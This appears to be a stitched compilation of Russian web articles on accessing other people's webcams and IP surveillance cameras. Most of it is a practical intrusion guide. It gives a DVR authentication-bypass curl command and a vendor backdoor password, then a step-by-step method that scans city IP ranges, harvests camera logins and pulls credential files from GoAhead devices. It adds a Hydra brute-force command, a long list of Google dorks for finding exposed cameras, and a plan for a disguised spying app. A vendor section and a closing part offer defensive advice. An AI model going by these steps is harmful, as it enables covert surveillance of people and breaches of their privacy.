Просмотр чужой веб камеры

Содержание

Взлом камер: векторы атак, инструменты поиска уязвимостей и защита от слежки

Просмотр чужой веб камеры
Камеры видеонаблюдения стали частью Интернета вещей и, как другие устройства с беспрепятственным доступом к сети, попали в фокус интереса хакеров. Миллионы IP-камер разных производителей открыты для злоумышленников.

Производители камер могут экономить на работе программистов и железе – покупатели получают дешевые устройства с ограниченными вычислительными ресурсами и огромными дырами в механизмах безопасности. Прошивки массово-потребительских noname устройств не выдерживают никакой критики. Часто они никем не обновляются и не становятся защищеннее после смены дефолтного пароля.

Более того, сам производитель может заложить бэкдор. Далее рассмотрим основные направления атак на системы видеонаблюдения.

«5MP пинхол объектив камера модуль для видеонаблюдения камера pinhole модуль от фабрики» С точки зрения потребителя рынок сложен нелогично.

При «копеечной» стоимости самих модулей IP-камер, на выходе получаем стоимость простейших устройств близкую к 100 долларам. Основная стоимость формируется на уровне выше железа. Главное – вычислительные ресурсы, прошивка и возможность поддерживать все «фишки» прошивки сколь угодно долго. Камера должна проработать годы на одинаково высоком уровне защиты.

Соль в том, что производитель embedded-оборудования, который стремится на всём экономить, с высокой вероятностью оставляет такие уязвимости в прошивке и железе, что даже доступ по «голому» протоколу ONVIF со сложным паролем не защищает от злоумышленника. Отсутствие автоматического обновления – приговор всей системе безопасности.

Обычный пользователь не следит за новостями в IT-сфере и не пойдет вручную скачивать новую прошивку для своей камеры, купленной на Aliexpress по распродаже.

Один из самых впечатляющих примеров эксплуатации особенностей дешевых камер связан с эксплойтом Heartbleed OpenSSL – это неприятное сочетание уязвимости Heartbleed со спецификой встраиваемых устройств, которые могут не обновляться вообще никогда.

В результате камеры используются для шпионажа и, что случается гораздо чаще, становятся частью ботнетов. Так взлом камер Xiongmai привёл к мощнейшей DDOS-атаке не сайты Netflix, Google, Spotify и .

Женщина на видео приобрела камеру в магазине уцененных товаров. Она хотела использовать устройство, чтобы следить за своим щенком. Через некоторое время камера начала разговаривать с хозяйкой и самостоятельно вращаться. А случилось то, что часто случается с дешевыми китайскими камерами, у которых прямой открытый доступ к видеопотоку предоставлен даже на сайте производителя. На первый взгляд, пароли к камерам могут показаться слишком очевидной мерой безопасности для обсуждения, однако десятки тысяч камер и видеорегистраторов регулярно компрометируют из-за использования заданных по умолчанию паролей.

Хакерская группировка Lizard Squad взломала тысячи камер видеонаблюдения, воспользовавшись простой заводской учетной записью, одинаковой для всех камер. Устройства взламывали банальным брутфорсом (хотя, возможно, подглядели логин и пароль у самого производителя).

В идеале производители должны назначать уникальный, длинный и не очевидный пароль для каждой камеры. Такой дотошный процесс требует времени для настройки и сложен в администрировании. Поэтому многие интеграторы используют один пароль для всех камер. Текучка кадров или смена ролей пользователей помогает создавать неожиданные дыры в безопасности предприятий. Если в системе отсутствует продуманный механизм разграничения прав доступа для различных сотрудников, групп камер и объектов, мы получаем потенциальную уязвимость вроде «чеховского ружья» – обязательно выстрелит.

Количество камер, зараженных через 81 TCP-порт (данные Shodan) Термин «переадресация портов» иногда заменяют на аналогичные: «проброс портов», «перенаправление портов» или «трансляция портов». Открывают порт на роутере, чтобы, к примеру, подключиться из Интернета к домашней камере. Большинство традиционных систем наблюдения, включая DVR, NVR и VMS, сегодня подключены к Интернету для удаленного доступа или функционируют в локалке, которая, в свою очередь, подключена к глобальной сети.

Проброс портов позволяет получить настраиваемый доступ к камере в вашей локальной сети, но также открывает окно возможностей для взлома. Если применить запрос определенного типа, поисковик Shodan покажет около 50 000 уязвимых устройств, свободно «болтающихся» в сети.

Открытая для Интернета система требует, как минимум, IDS / IPS для дополнительной защиты. В идеале, поместите систему видеонаблюдения в физически отдельную сеть или используйте VLAN.
Аргентинский исследователь по безопасности Эсекьель Фернандес опубликовал уязвимость, которая позволяет легко извлекать нешифрованное видео из локальных дисков различных DVR. Фернандес обнаружил, что можно получить доступ к панели управления определенных видеорегистраторов с помощью короткого эксплойта:

$> curl “http: // {DVR_HOST_IP}: {PORT} /device.rsp?opt=user&cmd=list” -H “Cookie: uid = admin”

Мы встречали удивительно много камер, DVR, NVR, VMS, которые не шифровали канал даже по SSL. Использование таких устройств грозит проблемами похуже, чем полный отказ от https. В Ivideon используем TLS-шифрование не только для видео в облаке, но и для потоков с камер. Помимо небезопасных соединений, те же риски конфиденциальности грозят при хранении нешифрованного видео на диске или в облаке. Для действительно безопасной системы видео должно быть зашифровано как при хранении на диске, так и при передаче в облако или локальное хранилище.

Перебор для самых маленьких Программное обеспечение для управления видеопотоком часто взаимодействует с различными потенциально уязвимыми компонентами операционной системы. Например, многие VMS используют Microsoft Access. Таким образом к нешифрованному видео можно подобраться через «дыры» в ОС. Поскольку камеры уязвимы со всех сторон, выбор целей для атаки необычайно широк, большая часть противоправных действий не требует специальных знаний или особых навыков. Почти любой, кто хочет нелегально посмотреть трансляцию с камеры, может легко сделать это. Поэтому неудивительно, что подключением к незащищенным камерам часто занимаются неквалифицированные хакеры просто ради развлечения.

Для брутфорса можно использовать программы BIG HIT SPAYASICAM и SquardCam, вместе с инструментами тестирования на проникновение masscan и RouterScan. Иногда даже не нужно пользоваться сканерами безопасности – сайты Insecam и IP-Scan облегчают задачу, помогая находить камеры в Интернете.

Значительно упрощает взлом доступ к RTSP-ссылке камеры. А желаемые ссылки можно получить тут или тут. Для удалённого просмотра и управления видеорегистраторами и камерами широко используются официальные приложения от производителей оборудования – SmartPSS и IVMS-4200.

Информация об открытых камерах или камерах с известными паролями широко распространена на имиджбордах и в соцсетях. Ролики со взломанных камер на набирают сотни тысяч просмотров.

У скомпрометированных камер существует несколько неочевидных способов использования. Среди них – криптовалютный майнинг. Сотрудники подразделения IBM X-Force обнаружили вариант трояна ELF Linux/Mirai, который оснащён модулем для майнинга биткоинов. Зловред ищет и заражает уязвимые устройства на Linux, включая DVR и камеры видеонаблюдения.

Более серьезные последствия могут возникнуть из-за использования уязвимых устройств в качестве промежуточных точек для атак на сторонние инфраструктуры, которые могут быть запущены для сокрытия следов судебной экспертизы, фальсификации данных или выполнения постоянного отказа в обслуживании (denial of service).

И последнее, о чем нужно знать при использовании камер – сам производитель может оставить для себя бэкдор с неизвестной целью. Так, специалисты по безопасности из компании Risk Based Security обнаружили уязвимость в камерах видеонаблюдения китайского производителя Zhuhai RaySharp Technology.

Прошивка изделий, производимых в RaySharp, представляет собой Linux-систему с CGI-скриптами, формирующими веб-интерфейс. Оказалось, что пароль 519070 открывает доступ к просмотру изображений и системным настройкам всех камер. Впрочем, подобные прошивки с небезопасным подключения к бэкэнду, встречаются часто.

Внутри одного из дата-центров Google Облачные сервисы видеонаблюдения не подвержены уязвимостям систем предыдущего поколения. Для облачного решения без переадресации портов настройка межсетевого экрана обычно не требуется. Для подключения к облаку Ivideon подходит любое интернет-соединение и не требуется статический IP-адрес.

Для всех устройств c сервисом Ivideon пароль генерируется случайным образом при подключении камер в личном кабинете. Для некоторых моделей камер, например, Nobelic, можно создать собственный пароль в личном кабинете пользователя Ivideon.

Мы не храним пароли пользователей, так что получить к ним доступ нельзя. Мы не храним централизованно видеоархивы. Они распределены между многими машинами в разных дата-центрах. Доступ к мобильному приложению защищен пин-кодом, а в будущем появится биометрическая защита. Также облачный сервис автоматически отправляет исправления и обновления безопасности через Интернет на любое локальное устройство пользователя. От конечного пользователя не требуется никаких дополнительных действий для мониторинга безопасности.

В Ivideon многие функции (за исключением облачного архива и модулей видеоаналитки) и все обновления безопасности для всех клиентов предоставляются бесплатно.

Надеемся, что эти простые правила будут использоваться во всех облачных сервисах видеонаблюдения.

Источник: https://habr.com/ru/company/ivideon/blog/443462/

Как подключиться к чужой веб-камере: пошаговое описание, рекомендации и особенности

Просмотр чужой веб камеры

На сегодняшний день технический прогресс дошел до такого уровня, что порой так и хочется поиграть в бога. Конечно, создавать людей у нас пока не получается, но вот взаимодействовать с единицами техники вполне возможно.

В данной статье будут рассмотрены теоретические возможности подключения к различным веб-камерам.

Обратите внимание, что содержимое данной статьи носит исключительно ознакомительный характер, поэтому помните, что вторжение в личное пространство другого человека, тем более таким способом, наказывается по закону.

Общая информация

Много людей опасается, что встроенная в их ноутбуки или подсоединённая к компьютеру камера может подглядывать и подслушивать. Следует отметить, что не зря. Причем это могут делать не только они, но и мобильные устройства, телевизоры и даже бытовые приборы вроде утюгов (с ними был несколько лет назад скандал в РФ). И сейчас мы рассмотрим, как подключиться к чужой веб-камере.

Выбираем инструмент

Необходимые средства может представить четвертая версия .NET Framework и VS2010. Также для подключения подойдут технологии DirectDraw и MSDN.

Но для решения задачи в рамках статьи основное внимание будет уделено технологии Video For Windows (VFW). При этом широко используются WinAPI функции. Конечно, это не все доступные технологии, с помощью которых можно получить доступ к камере.

Но они являются наиболее проработанными и совершенными из широкоизвестных и доступных людям.

Начинаем

Так как подключиться к чужой веб-камере? Первоначально следует учитывать, что у устройства может быть несколько аппаратов для фиксации изображения и звука. Поэтому следует позаботиться о возможности выбора инструмента, с которым будет вестись работа. Чтобы решить эту задачу, мы используем функцию capGetDriverDescription().

Она может принять пять параметров:

  • wDriverIndex – это индекс драйвера видеозахвата. Он может принимать значения от нуля до девяти.
  • lpszName – параметр указывает на буфер, где содержится соответствующее имя драйвера.
  • cbName используется для указания размера в байтах буфера lpszName.
  • lpszVer содержит указатель на буфер, где можно найти описание определённого драйвера.
  • cbVer – это размер в байтах буфера, где хранится описание драйвера.

Как подключиться к чужой веб-камере? Ipb image может выдать активацию камеры. Поэтому необходимо поработать и над этим. Можно, конечно, здесь написать небольшой код, позволяющий подключиться и контролировать работу устройства, но поскольку это вторжение в личную жизнь, то будет представлено только описание. Для создания необходимой программы можно использовать C#.

При работе необходимо указывать имя функции, что подключается, а также написать имя DLL, где она определена. Для компоновки всех отдельных наработок следует использовать класс.

https://www.youtube.com/watch?v=MRjRvT2-3TQ

Продолжаем выяснять, как подключиться к веб-камере чужого компьютера. Специалисту код может показаться очень простым в реализации. Что же нужно делать? Выше писалось о первом параметре функции capGetDriverDescription(), который может приобретать значение от нуля до девяти. Поэтому следует запустить цикл, который будет целенаправленно работать в этом диапазоне для поиска нужно значения.

Итак, список устройств у нас есть. Теперь нужно позаботиться о передаче видеопотока. В этом поможет функция capCreateCaptureWindow(), главное предназначение которой – это создавать окно захвата. Что же нужно делать в этом случае? Звучит всё банально – требуется только отправлять сообщения окну захвата. В этом поможет хорошо знакомая функция SendMessage().

Но вернёмся к capCreateCaptureWindow().

Захватываем изображение

Функция capCreateCaptureWindow() имеет такие аргументы, представляющие для нас интерес:

  • lpszWindowName – это нуль-терминальная строка, которая содержит имя окна захвата;
  • х – местоположение координаты Х;
  • у – местоположение координаты У;
  • nWidth – ширина окна;
  • nHeight – высота окна;
  • dwStyle – стиль окна;
  • hWnd – обращение к родительскому окну;
  • nID – идентификатор окна.

В результате выполнения функции будет получен NULL (в случае ошибки) или же успешно создано подключение. Но учитывайте, что, поскольку она относится к WinAPI, необходимо её импортировать. Со всеми этими данными можно уже запускать процесс инициализации камеры.

Сразу после создания окна можно уже пробовать отправить сообщение. Если результат будет отличимый от нуля, то это значит, что попытка завершилась успешно. Затем необходимо определить и отправить сообщения, от которых зависит ряд операций.

Так, следует в порядке очереди:

  • соединиться с драйвером устройства, что обеспечивает видеозахват;
  • осуществить разрыв;
  • копировать кадр в буфер обмена;
  • при надобности включить режим предпросмотра;
  • в случае нужды активировать перекрытие;
  • при надобности отрегулировать скорость предпросмотра;
  • в случае нужды включить масштабирование;
  • при надобности установить функцию вызова для предпросмотра;
  • получить с драйвера видеозахвата одиночный фрейм;
  • сохранить кадр, полученный от камеры, в файл.

Что ж, в целом это всё.

А что с другими устройствами?

В мире существуют не только компьютеры. Если вас интересует, как подключиться к веб-камере чужого ноутбука, то описанный способ отлично подойдёт и для этой цели.

Конечно, если там установлена операционная система “Виндовс”. Любителям “пингвинов” это не подойдёт. Ведь там, как правило, требуется разрешение пользователя на любое действие.

И если есть желание подключиться к “Линуксу”, то придётся просить, чтобы человек разрешил за ним следить.

Конечно, чисто теоретически он может разрешить по глупости или случайно. Но в реальности уповать на это не приходится. Если стоит вопрос о том, как подключиться к чужой веб-камере айфона или “Андроида”, то здесь многое зависит от используемой операционной системы. И говорить даже в общих чертах очень сложно из-за их большого разнообразия.

Заключение

Но нет ничего невозможного, если поставить себе цель и упорно работать над её достижением. Возьмём, к примеру, айфон. Телефоны этой серии считаются хорошо защищенными. И взломать программным способом их (по крайней мере официально) невозможно. Но на практике найти брешь можно.

Главное, хорошо поискать. Допустим, мы сделаем приложение, передающее видео нам. И под видом чего-то заставим пользователя загрузить и установить его. При этом пропишем создание тайной копии, что не будет отображаться в регистрах. И всё.

Пускай пользователь даже удалит приложение, мы всё равно будем следить за ним.

Источник: https://FB.ru/article/337919/kak-podklyuchitsya-k-chujoy-veb-kamere-poshagovoe-opisanie-rekomendatsii-i-osobennosti

Подробный гайд по взлому камер наблюдения. Как взломать камеру видеонаблюдения?

Просмотр чужой веб камеры

На сегодняшний день больше миллиона IP-камер и IP-видеорегистраторов разных производителей позволяют удаленно получить доступ к их настройкам безо всякой авторизации.

Удаленный доступ к веб-камерам и камерам наблюдения — самая наглядная практика взлома. Она иногда вообще не требует спец. софта, позволяя обойтись только браузером и нехитрыми манипуляциями. Тысячи цифровых глаз по всему миру станут доступны, если ты умеешь находить их IP-адреса и уязвимости.

наблюдение используется преимущественно для охраны, а потому не жди веселых картинок с первой же хакнутой камеры. Может, тебе и посчастливится быстро найти HD-трансляцию из элитного борделя, но чаще будут попадаться скучные виды на безлюдные склады и парковки с разрешением VGA.

Сразу необходимо отметить, что это противозаконно и статья написана исключительно в информационных целях, чтобы владельцы систем видеонаблюдения знали об опасности.

Немного теории, потом практика….

Практически все современные цифровые IP камеры видеонаблюдения построены на операционной системе linux, которая сильно урезана и имеет только самое необходимое для работы.

Сама по себе операционная система linux бесплатная, очень надежная и устойчивая к внешним воздействиям и взломам, поэтому производитель и строит на ее базе видеорегистраторы, видеосервера, камеры видеонаблюдения, NAS и прочии умные гаджеты.

Под “взломом камеры видеонаблюдения” будем понимать получение доступа под администратором.

IP-камеры и веб-камеры часто путают, хотя это принципиально разные устройства. Сетевая камера, или IP-камера, — самодостаточное средство наблюдения. Она управляется через веб-интерфейс и самостоятельно передает видеопоток по сети. По сути, это микрокомпьютер со своей ОС на базе Linux.

Сетевой интерфейс Ethernet (RJ-45) или Wi-Fi позволяет выполнять прямое подключение к IP-камере. Раньше для этого использовались фирменные клиентские приложения, но большинство современных камер управляются через браузер с любого устройства — хоть с компа, хоть со смартфона.

Как правило, IP-камеры включены постоянно и доступны удаленно. Именно этим и пользуются хакеры.

А теперь о взломе камер

Прежде чем начать, нам нужно подготовить свою программную базу, с чем мы будем иметь дело.

Cписок необходимого ПО, ссылки на загрузку:

1. KPortScan (пароль от архива: lamerland ) {Антивирус может ругаться}

2. Клиент iVMS-4200

3. Yoba parser

Приступим:

Итак, для начала нам нужны диапазоны ip нужного нам города. Переходим на сайт https://4it.me/getlistip , вводим название города.

После чего, получаем большой список IP диапазонов

Копируем его(для быстроты, можно фрагмент), запускаем KPortScan, и вставляем наши диапазоны в левый столбец. Так же нужно выставить порт 8000, и после этого нажимаем “Start”:

Ждём, пока наберётся приличное кол-во “гудов”:

После завершения проверки, открываем из папки с программой текстовик “results.txt”.

И копируем все IP адреса.

Открываем папку с программой Yoba Parser.

Из папки с программой открываем текстовик ip.txt – и вставляем сюда все наши IP.

Запускаем программу – Она без интерфейса, так что просто нужно подождать, пока она закроется:

После завершения программы открываем текстовый документ “out.txt”  и видим наши результаты!

IP адресс камеры – (1)

Логин от камеры – (2)

Пароль от камеры – (3)

Запускаем программу iVMS-4200:

• Нажимаем Device Management

• Нажимаем кнопку “Add”

• В поле “Nickname” – вводим любое называние

• В поле “Adress” -вводим IP адрес камеры

• В поле “Login” – вводим Логин камеры (admin)

• В поле “Password” – вводим Папроль камеры (12345)

• И нажимаем кнопку “Add”:

Способ через дорки в Shodan

К слову, есть ещё один способ проверки веб камер. Через всеми нами любимый Shodan.

Мы будем делать поиск по данному запросу:

realm=”GoAhead”, domain=”:81″

(порт можно выбрать 81,8080).

Копируем IP адрес, с указанием порта, вставляем в новую вкладку.И приписываем следующее:

/system.ini?loginuse&loginpas

Получится как-то так:

179.252.228.9:81/system.ini?loginuse&loginpas

После этого у вас должен был скачаться файл system.ini, его нужно открыть. Среди лишних символов тут содержится логин и пароль от камеры.

Если вдруг не скачивается файл, переходите к другому IP. После чего, переходите на тот самый IP с портом, должно вылезти окошко авторизации
Вводим туда логин/пароль с файла system.ini, пробуем варианты.

Входить можно как и через браузер, так и через клиент iVMS 4200.

Часто бывает, что производитель оставляет в прошивке камеры служебный вход для сервис-центров. Он остается открытым даже после того, как владелец камеры сменил дефолтный пароль. В мануале его уже не прочтешь, а вот найти на тематических форумах можно.

Огромная проблема состоит в том, что во многих камерах используется один и тот же веб-сервер GoAhead. В нем есть несколько известных уязвимостей, которые производители камер не спешат патчить.

GoAhead, в частности, подвержен переполнению стека, которое можно вызывать простым запросом HTTP GET. Ситуация усложняется еще и тем, что китайские производители модифицируют GoAhead в своих прошивках, добавляя новые дыры.

Камеры среднего и высокого класса оснащают поворотными креплениями. Взломав такую, можно сменить ракурс и полноценно осмотреть все вокруг. Особенно занятно бывает играть в перетягивание камеры, когда, помимо тебя, ей одновременно пытается управлять кто-то еще. В общем случае атакующий получает полное управление камерой прямо из своего браузера, просто обратившись по нужному адресу.

Взломать камеру видеонаблюдения с помощью грубой атаки

Представьте, что камера видеонаблюдения использует пароль, основанный на обычном слове, которое можно найти в словаре, таком как « бог, дом, секрет » и т. Д.

Кто-нибудь может взломать камеру видеонаблюдения, просто попробовав разные пароли, пока не найдете правильный. Это то, что работает.

Хорошо, теперь вы думаете, что этот метод слишком сложный и медленный, поскольку сложно набрать любое слово, которое доступно в словаре, просто чтобы попытаться найти то, которое будет работать для входа в камеру видеонаблюдения, верно?

Что ж, если вы дадите эту задачу программному обеспечению, которое может проверять сотни или тысячи паролей в минуту, у вас будет больше шансов на успех.

Посмотрите на диаграмму ниже, чтобы понять, как работает эта техника.

https://www.youtube.com/watch?v=CnlYv1-DaeU

Вы можете использовать Hydra для Linux или Windows, и вам просто нужно иметь готовый файл паролей со словами, которые вы хотите использовать, и выполнить команду

hydra -s 88 -l admin -P /root/desktop/pass.txt -e ns

Смотрите ниже синтаксис

-s 88 – номер порта на IP-камере

-l admin – имя для входа по умолчанию, которое будет использоваться (admin)

-P /root/desktop/pass.txt – файл списка паролей

-e — пустой пароль

ns — попробуйте логин и пустой пароль

Программное обеспечение запускается и начинает пробовать разные слова, которые оно получает из txt-файла, и продолжайте делать это до совпадения. Если камера CCTV допускает такие быстрые попытки, это всего лишь вопрос времени, когда программное обеспечение найдет правильный пароль.

Современные IP-камеры видеонаблюдения не допускают такого рода атаки методом перебора, потому что они блокируются на некоторое время после слишком большого количества попыток входа в систему.

Заключительные слова

Существуют различные способы взлома камеры видеонаблюдения, и все они включают в себя, по крайней мере, некоторые базовые навыки злоумышленника, которые должны быть в состоянии хотя бы немного понять интернет и то, как использовать компьютер и программное обеспечение.

Помните, что любое IP-устройство, подключенное к Интернету, находится под угрозой, и нет никакой гарантии, что оно 100% и не может быть взломано кем-либо. Идея этой статьи – помочь людям понять, как можно взломать камеру видеонаблюдения и как минимизировать шансы злоумышленника.

Отказ от ответственности: Автор или издатель не публиковали эту статью для вредоносных целей. Вся размещенная информация была взята из открытых источников и представлена исключительно в ознакомительных целях а также не несет призыва к действию. Создано лишь в образовательных и развлекательных целях. Вся информация направлена на то, чтобы уберечь читателей от противозаконных действий. Все причиненные возможные убытки посетитель берет на себя. Автор проделывает все действия лишь на собственном оборудовании и в собственной сети. Не повторяйте ничего из прочитанного в реальной жизни. | Так же, если вы являетесь правообладателем размещенного на страницах портала материала, просьба написать нам через контактную форму жалобу на удаление определенной страницы, а также ознакомиться с инструкцией для правообладателей материалов. Спасибо за понимание.

Источник: https://RuCore.net/podrobnyj-gajd-po-vzlomu-kamer-nablyudeniya-kak-vzlomat-kameru-videonablyudeniya/

Google хак или шарим по веб камерам | Блог из Соснового Бора Онлайн

Просмотр чужой веб камеры
Открой счет в Agea сегодня и получи $5 для торговли!

Вы любите подглядывать в замочную скважину?

Вы любопытны?

Нет?

И не смотрели в детстве в дырочку на стекле закрашенным краской в женскую баню?

Это же так познавательно. И вообще никогда не прислушивались ни к чему, что говорят другие вполголоса.

А может они про вас говорят?

Если скажете нет, не поверю? Или вы просто не любознательны и не любопытны, и это уже диагноз. Или вы такой древний, что уже всё повидали и вас ничем не удивишь.

Так вот, этот пост для любопытных. Для тех кто любит подглядывать в основном и совать нос в чужие делишки, и не стыдится этого. Проще говоря пост про веб камеры которые никто не афиширует, а посмотреть то хочется в чужие веб камеры.

Писать много не буду, а предложу вам способы, с помощью которых можно чужие веб камеры посмотреть. Ну не всё же время пахать в оффлайн и онлайн работе. Надо же и отрываться иногда.

На помощь нам приходит небезызвестный Google. А вернее запросы с помощью которых мы его будем окучивать, чтобы найти чужие веб камеры.

Ну и поглазеть на то, что кто то не очень нам хочет показать.

Ниже то, что смог надыбать на просторах интернета, то есть поисковые запросы к Google по поиску онлайн вебкамер. Копируете запрос в поиск Google и радуетесь находкам.

Запросов очень много. И на каждом куча интернет камер. По моему это самая большая коллекция запросов по поиску web камер.

Итак…

Mobotix Network Cameras

intext:MOBOTIX M1?intext:MOBOTIX M10?

intext:Open Menu Shift-Reload

Axis Cameras

intitle:Live View / – AXISinurl:view/view.sht

inurl:view/view.shtml axis

Linksys Wireless Cameras

inurl:next_file=main_fs.htm
inurl:img inurl:image.cgi

Много запросов для поиска чужих веб камер

inurl:ViewerFrame?Mode=

inurl:ViewerFrame?Mode=Refresh

intitle:axis 2400 video server

inurl:axis-cgi

inurl:axis-cgi/jpg

inurl:axis-cgi/mjpg (motion-JPEG)

intitle:axis intitle:video server

intitle:live view intitle:axis

inurl:indexFrame.shtml Axis

intitle:VisionGS Webcam Software

intitle:flexwatch

intitle:web image monitor

intext:Powered by VisionGS Webcam

inurl:/view.shtml

intitle:Live View / – AXIS

intitle:”live view” intitle:axis

inurl:view/view.shtml

inurl:ViewerFrame?Mode=

inurl:ViewerFrame?Mode=Refresh

inurl:view/indexFrame.shtml

inurl:view/index.shtml

inurl:view/view.shtml

inurl:servlet/DetectBrowser

intitle:liveapplet

intitle:liveapplet inurl:LvAppl

allintitle:Network Camera NetworkCamera

allinurl:control/multiview

intitle:EvoCam inurl:webcam.html

intitle:supervisioncam protocol

intitle:Live NetSnap Cam-Server feed

intitle:Live View / – AXIS

intitle:Live View / – AXIS 206M

intitle:Live View / – AXIS 206W

intitle:Live View / – AXIS 210?

inurl:indexFrame.shtml Axis

Поиск чужих веб камер

inurl:netw_tcp.shtml

inurl:MultiCameraFrame?Mode=Motion

inurl:yapboz_detay.asp + View Webcam User Accessing

inurl:webArch/mainFrame.cgi

intitle:start inurl:cgistart

intitle:WJ-NT104 Main Page

intext:MOBOTIX M1? intext:Open Menu

intext:MOBOTIX M10? intext:Open Menu

intext:MOBOTIX D10? intext:Open Menu

intitle:MOBOTIX intitle:PDAS

intitle:MOBOTIX intitle:Seiten

inurl:/pda/index.html +camera

intitle:snc-z20 inurl:home/

intitle:snc-cs3 inurl:home/

intitle:snc-rz30 inurl:home/

intitle:sony network camera snc-p1?

intitle:sony network camera snc-m1?

intitle:(EyeSpyFX|OptiCamFX) go to camera

site:.viewnetcam.com -www.viewnetcam.com

site:miemasu.net

intitle:Toshiba Network Camera user login

intitle:netcam live image

intitle:i-Catcher Console – Web Monitor

allintitle: EDR1600 login | Welcome

allintitle: EDR400 login | Welcome

allintitle: Axis 2.10 OR 2.12 OR 2.30 OR 2.31 OR 2.32 OR 2.33 OR 2.34 OR 2.40 OR 2.42 OR 2.43 “Network Camera ”

allintitle: EverFocus | EDSR | EDSR400 Applet

allintitle:DVR login

allintitle:Network Camera NetworkCamera

allintitle:SyncThru Web Service

allintitle:Brains, Corp. camera

allintitle:Edr1680 remote viewer

allinurl:index.htm?cus?audio

axis storpoint “file view” inurl:/volumes/

camera linksys inurl:main.cgi

Вебкамеры Камеры видеонаблюдения

intitle:”::::: INTELLINET IP Camera Homepage :::::

intitle:BlueNet Video Viewer

intitle:”Sony SNT-V304 Video Network Station” inurl:hsrindex.shtml

intitle:active webcam page

intitle:my webcamXP server!” inurl:”:8080″

intitle:flexwatch intext:”Copyright by Seyeon TECH Co”

inurl:pictype=jpegserverpush

inurl:Camera.aspx?ServerID

intext:”Copyright by Seyeon TECHCo”

intitle:”WJ-NT104 Main”

intitle:”WJ-NT104 Main Page”

intitle:”WV-NP244″

inurl:home/homeJ.html

inurl:home/homeS.html

inurl:home/PViewer.html

inurl:next_file=main_fs.htm

inurl:dyndns.org inurl:index.shtml

inurl:dyndns.org Axis|Mobotix

inurl:live2.jsp?CID=

inurl:webcam.asp

inurl:image?cachebust=

inurl:webcam.php

intitle:”Orite IC301″

intitle:”ORITE Audio IP-Camera IC-301″

inurl:camstreams.com Live

intitle:”IQeye302 | IQeye303 | IQeye601 | IQeye602 | IQeye603″ intitle:”Live Images”

inurl:”top.htm?Currenttime”

intitle:”QuickCamPro WebCam” inurl:webcam

inurl:”pocketpc?camnum=1″

inurl:Remote/index.php3 intitle:Live Video

inurl:/Aview.htm

inurl:/Jview.htm

inurl:/servlet/MoveRouter (on /servlet/Frames is the cam)
inurl:eyespyfx_large.jsp

intitle:”EyeSpyFX”

inurl:snap.html +intitle:”SiteCam”

intitle:”SiteCam Video Snapshot”

intitle:”SiteZAP WebCam Control”

inurl:chconv?CH=

inurl:getuid?PAGE= Camera

inurl:/app/sample/ab1.asp

inurl:app/idxas.html

inurl:toolam.html

inurl:/img/vr.htm

inurl:main.cgi?next_file=v_video.htm

inurl:next_file=main.htm

inurl:next_file=main2.htm

inurl:portal_main.html intitle:Panasonic

inurl:ap/wsmain.html

inurl:/cam_portal.cgi

intitle:start inurl:cgistart

inurl:viewer/live/en/live.html

inurl:sample/Others/SvrPush.htm

inurl:/user_view_M.htm

inurl:/user_view_S.htm

inurl:/user/cgi-bin/view_M_t1.thtml

inurl:/user/cgi-bin/view_S_t_uF.thtml

inurl:control/userimage.html

inurl:/control/player

inurl:cgi-bin/guestimage.html

inurl:/mpeg4/video.sdp

inurl:view/ptzFrame.shtml

inurl:axis-cgi/mjpg/video.swf

inurl:view/ctl.shtml

inurl:netw_tcp.shtml

inurl:cgi-bin/push.html

intitle:”axis #Kameramodell#”

Всё…

Копирайт Gertc.

Ссылка желательна

на RSS,

Будут Сосны до Небес, Вот. Не Подписался,

Без Сосны Остался.

Источник: http://gertc.com/khak/google-khak-ili-smotrim-chuzhie-veb-kamery.html

Как взламывают веб-камеры и как защититься от этого?

Просмотр чужой веб камеры

Глядя в глазок веб-камеры на компьютере или ноутбуке, иногда приходит странная мысль, что оттуда на вас тоже смотрят. Между тем, в этом нет ничего невозможного. Киберпреступники обладают многочисленными инструментами для взлома веб-камер посторонних людей.

Мы расскажем о трёх способах, с помощью которых злоумышленники могут получить доступ к вашей веб-камере незаметно для вас, а также о вариантах защиты от этого.

Как легко взломать веб-камеру

Нельзя сказать, что взломать веб-камеру очень просто. Для этого злоумышленник должен пробраться на ваш компьютер, после чего получить доступ к камере.

Как взламывают веб-камеры? При помощи шпионского программного обеспечения, используя проблемы с подключением к интернету или же трояны.

Доступ при помощи шпионского программного обеспечения

Приложения вида Remote Administration Tools (RAT) часто устанавливаются на компьютеры в организациях для помощи в обновлении, настройке и дистанционного отслеживания работы сотрудников.

В 2010 году на две средние школы в Lower Merion School District подали в суд за использование дистанционного мониторинга через приложение LANrev. Ученики не знали об этом.

Ноутбуки принадлежали школам и использовались учениками для выполнения домашнего задания. Установленное программное обеспечение безопасности содержало Theft Track, что давало возможность просматривать веб-камеры.

Говорилось, что слежение использовалось только в случае кражи ноутбуков. Однако, некоторые школьники утверждали, что индикатор веб-камеры периодически загорался. Некоторые из них заклеили камеры.

Округ позже признал, чтобы были сделаны около 56000 фотографий школьников. Более современная версия этого программного обеспечения не содержит такой возможности.

Если вы опасаетесь, что ваш рабочий или учебный ноутбук или компьютер шпионят за вами, наклейте на камеру скотч. Даже если посторонние получат к ней доступ, они ничего не увидят.

Не стоит полагаться на индикатор, который должен загораться, когда камера активна. Есть вероятность, что его смогли отключить.

Использование интернет-подключения веб-камеры

Веб-камера с возможностью подключаться к другим устройствам через интернет может пригодиться, если вы хотите следить за квартирой, когда вас там нет.

Многие комплекты домашней безопасности предлагают камеры наблюдения с доступом через интернет, чтобы вы могли проверять, что дома всё в порядке.

Можно превратить веб-камеры в инструменты домашнего наблюдения при помощи специального программного обеспечения.

Однако, устройства с выходом в интернет могут быть опасны, поскольку ими могут воспользоваться хакеры. Для спокойствия не приобретайте веб-камеры с возможностью удалённого подключения через Wi-Fi. Не устанавливайте стороннее программное обеспечение, которое позволяет дистанционно просматривать изображение с вашей камеры. Есть вероятность, что этим смогут воспользоваться посторонние.

Лучшие веб-камеры 2021 года

Доступ через трояны

Если хакеры не могут использовать существующие точки входа в веб-камеру, они постараются создать новые. Это простейший метод, поскольку жертвы сами приходят к ним.

Нужно обманом заставить установить на компьютер троян, который выдаёт себя за обычное безвредное приложение. На самом деле он открывает злоумышленникам доступ к компьютеру.

Троян может прийти через вложение в электронном письме, на веб-странице, через поддельные сообщения об обнаружении у вас на компьютере вирусов с предложением удалить их.

Если согласиться, вирус на самом деле появится на компьютере.

Когда злоумышленник установил троян, он может поставить приложение для дистанционного доступа к компьютеру. После этого он может делать с ним что угодно незаметно для вас, в том числе просматривать веб-камеру.

Как защитить себя от взлома веб-камеры

